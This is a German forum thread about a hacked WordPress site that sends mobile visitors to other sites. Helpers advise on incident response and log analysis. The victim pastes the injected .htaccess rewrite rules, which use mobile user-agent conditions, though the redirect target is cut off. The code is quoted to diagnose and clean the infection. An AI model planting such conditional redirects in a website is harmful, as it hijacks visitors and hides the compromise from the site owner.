WP Gehackt (mobile Umleitung)

  • Hi
    2 meiner Seiten wurden anscheinend gehackt - und zwar wird man mobil auf diverse Seiten weitergeleitet.
    Hilft es wenn ich eine Liste der Plugins poste oder welche Informationen könnten sonst noch weiterhelfen?
    (Ich habe nun alles geupdatet und backups erstellt)
    LG Max

    Edit SirEctor: verseuchten Link unklickbar gemacht.

    5 Mal editiert, zuletzt von SirEctor (8. März 2019 um 17:08)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Erster Schritt - https://binary-butterfly.de/artikel/hilfe-…at-einen-virus/

    Zweitens - ist ein "ungehacktes" Backup vorhanden?

    Nachträglich die Aktualisierungen durchzuführen bringt nichts. Man muss analysieren wie der Angriffer es geschafft hat und diese Lücke schließen, sowie auch eventuelle "Änderungen" welche durch den Hack passiert sind zu bereinigen!!

    Weitere Info zur Selbsthilfe: https://www.damianschwyrz.de/content/anleit…kdoors-befreien

    PS: Es gibt dafür auch Profis, welche Dir die Seite bereinigen.

    LG

  • Vielen Dank für das Feedback.

    Der Schadcode war in der htaccess Datei:

    RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC] RewriteRule

  • Was mir unbekannt ist, ist wie der Angreifer reingekommen ist


    Falls du Zugriff auf access.log hast, suche mal nach Begiffen POST und .htaccess. Könnte sein das du über den referer Eintrag schon das Einfallstor ermitteln kannst.

    Code
    Angreifer.IP - - [07/Mar/2019:21:09:17 +0100] "POST /.htaccess HTTP/1.0" 200 1696 "http://deinedomain/einfallstor" "Mozilla/5.0 (Windows NT 5.1; WOW64; x64) AppleWebKit/531.70.27 (KHTML, like Gecko) Chrome/56.1.6873.1501 Safari/532.10 OPR/42.0.5151.0888"

    Ist jetzt nur ein Beispiel, wie so ein Eintrag aussehen könnte.

    Bitte keine Fragen per PM, oder Foren-Chat. Für Fragen ist das öffentliche Forum da. Meine Uerdinger Seite

  • 1. Das Änderungdatum der o.g. gehackten .htaccess mit den Logs abgleichen, das wäre der wichtigste Anhaltspunkt
    2. Rausfinden warum ein Fehler 404 (der nicht aus WordPress kommt) bei den Unterseiten erscheint

    Am besten wohl einen Profi beauftragen, bevor noch mehr Spuren verwischt werden.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!